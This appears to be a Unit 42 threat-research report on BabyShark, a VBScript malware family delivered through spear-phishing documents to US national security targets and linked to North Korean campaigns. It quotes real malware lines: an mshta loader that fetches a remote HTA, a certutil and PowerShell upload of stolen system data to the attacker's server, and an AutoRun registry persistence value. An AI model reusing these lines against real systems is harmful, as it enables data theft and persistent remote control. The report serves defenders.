In February 2019, Palo Alto Networks Unit 42 researchers identified spear phishing emails sent in November 2018 containing new malware that shares infrastructure with playbooks associated with North Korean campaigns. The spear phishing emails were written to appear as though they were sent from a nuclear security expert who currently works as a consultant for in the U.S. The emails were sent using a public email address with the expert’s name and had a subject referencing North Korea’s nuclear issues. The emails had a malicious Excel macro document attached, which when executed led to a new Microsoft Visual Basic (VB) script-based malware family which we are dubbing “BabyShark”.
BabyShark is a relatively new malware. The earliest sample we found from open source repositories and our internal data sets was seen in November 2018. The malware is launched by executing the first stage HTA from a remote location, thus it can be delivered via different file types including PE files as well as malicious documents. It exfiltrates system information to C2 server, maintains persistence on the system, and waits for further instruction from the operator. Figure 1, below, shows the flow of execution.
Figure 1 BabyShark execution flow
Unit 42 was able to determine the phishing emails targeted at least:
- A university in the U.S. which was to hold a conference about North Korea denuclearization issue at the time
- A research institute based in the U.S. which serves as a think tank for national security issues, and where the previously referenced nuclear expert currently works.
Expanding our search to public repository samples, we identified additional malicious document samples delivering BabyShark. The original file names and decoy contents of these samples suggested that the threat actor might have interests in gathering intelligence related to not only North Korea, but possibly wider in the Northeast Asia region.
BabyShark is a relatively new malware. The first sample we observed is from November 2018. The decoy contents of all malicious documents delivering BabyShark were written in English and were related to Northeast Asia’s regional security issues.
Figure 2 Timeline of BabyShark malicious documents and filename / decoys
While some decoys used content which is publicly available information on the internet, some used content which appears to not be public. Inspecting the metadata of the documents with this non-public content, we suspect that the threat actor likely compromised someone with access to private documents at a U.S. national security think tank.
Figure 3 Decoy content copied from the internet
Figure 4 Decoy content not publicly available on the internet (intentionally obfuscated)
The malicious documents contain a simple macro which would load the BabyShark’s first stage HTA at a remote location.
Shell (“mshta https://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta”)
BabyShark Malware Analysis
Analyzed sample details:
|Create Date||2018:12:31 02:40:00Z|
|Modify Date||2019:01:10 06:54:00Z|
Table 1 Analyzed sample details
The sample is a Word document which contains a malicious macro loading BabyShark by executing the first stage HTA file at a remote location below:
After successfully loading the first stage HTA, it sends out an HTTP GET request to another location on the same C2 server, then decodes the response content with the following decoder function.
For jx=0 To d-1
For ix=0 To Int(L/d)-1
The decoded BabyShark VB script first enables all future macros for Microsoft Word and Excel by adding the following registry keys:
It then issues a sequence of Windows commands and saves the results in %AppData%\Microsoft\ttmp.log.
dir “%programfiles% (x86)”
dir “%programdata%\Microsoft\Windows\Start Menu”
dir “%programdata%\Microsoft\Windows\Start Menu\Programs”
reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default”
The collected data is encoded using Windows certutil.exe tool, then uploaded to the C2 via a HTTP POST request.
retu=wShell.run(“certutil -f -encode “””&ttmp&””” “””&ttmp1&””””,0,true)
retu=wShell.run(“powershell.exe (New-Object System.Net.WebClient).UploadFile(‘https://tdalpacafarm[.]com/files/kr/contents/upload.php’,'”&ttmp1&”‘);del “””&ttmp1&”””;del “””&ttmp&””””,0,true)
BabyShark adds the following registry key value to maintain persistence and waits for further commands from the operator. Unfortunately, we were not able to collect additional commands issued by the operator.
HKCU\Software\Microsoft\Command Processor\AutoRun, value: “powershell.exe mshta https://tdalpacafarm[.]com/files/kr/contents/Usoro.hta”
This registry key executes the string value when cmd.exe is launched. BabyShark ensures cmd.exe is launched by registering the following scripts as scheduled tasks:
Set wShell=CreateObject(“WScript.Shell”):retu=wShell.run(“cmd.exe /c taskkill /im cmd.exe”,0,true)
wShell=new ActiveXObject(“WScript.Shell”);retu=wShell.run(“cmd.exe /c taskkill /im cmd.exe””,0,true);
Links to Other Activity
We noticed BabyShark having connections with other suspected North Korean activities in the past; KimJongRAT and STOLEN PENCIL.
- BabyShark and KimJongRAT use the same file path for storing collected system information: %AppData%/Microsoft/ttmp.log.
- KimJongRAT had similar interests in targeting national security related targets. The malware was delivered with the following decoys:
|Decoy Filename||Dropper SHA256|
|Kendall-AFA 2014 Conference-17Sept14.pdf||c4547c917d8a9e027191d99239843d511328f9ec6278009d83b3b2b8349011a0|
|U.S. Nuclear Deterrence.pdf||1ad53f5ff0a782fec3bce952035bc856dd940899662f9326e01cb24af4de413d|
|제30차한미안보 안내장 ENKO.fdp.etadpU.scr (translates to 30th Korea-U.S. National Security Invitation Update)||b3e85c569e89b6d409841463acb311839356c950d9eb64b9687ddc6a71d1b01b|
|Conference Information_2010 IFANS Conference on Global Affairs (1001).pdf||0c8f17b2130addebcb2ca75bd7a982e37ddcc49d49e79fe60e3fda767f2ec972|
Table 2 Decoy filename used when delivering KimJongRAT
- The threat actor behind the BabyShark malware frequently tested its samples for anti-virus detection when developing the malware. The testing samples included a freshly compiled KimJongRAT.
|SHA256||Size||Compile Date||AV Test Site Upload Date|
|52b898adaaf2da71c5ad6b3dfd3ecf64623bedf505eae51f9769918dbfb6b731||685,568 bytes||2019-01-04 05:44:31||2019-01-04 08:15:41|
Table 3 Freshly compiled testing KimJongRAT sample
STOLEN PENCIL connection:
- A freshly compiled testing version of a PE type BabyShark loader was uploaded to a public sample repository. The sample was signed with the stolen codesigning certificate used in the STOLEN PENCIL campaign. We did not notice any other malware being signed with this certificate.
|SHA256||Size||Compile Date||AV Test Site Upload Date|
|6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c||32,912 bytes||2018-12-21 00:34:35||2018-12-21 08:30:28|
Table 4 Signed testing version of PE type BabyShark loader sample
Figure 5 Codesign details
BabyShark is being used in a limited spear phishing campaign which started in November 2018 and is still ongoing. The threat actor behind it has a clear focus on gathering intelligence related to Northeast Asia’s national security issues. Well-crafted spear phishing emails and decoys suggest that the threat actor is well aware of the targets, and also closely monitors related community events to gather the latest intelligence. While not conclusive, we suspect that the threat actor behind BabyShark is likely connected to the same actor who used the KimJongRAT malware family, and at least shares resources with the threat actor responsible for the STOLEN PENCIL campaign. We also noticed testing indicating the attackers are working on a PE loader for BabyShark. The threat actor may use different methods to deliver BabyShark in the future campaigns.
Palo Alto Networks customers are protected from this threat in the following ways:
- WildFire and Traps detect all the malware supported in this report as malicious.
- C2 domains used by the attackers are blocked via Threat Prevention.
AutoFocus customers can monitor ongoing activity from the threats discussed in this report by looking at the following tag:
Palo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit cyberthreatalliance.org.
Indicators of Compromise
PE version loader, signed with stolen certificate: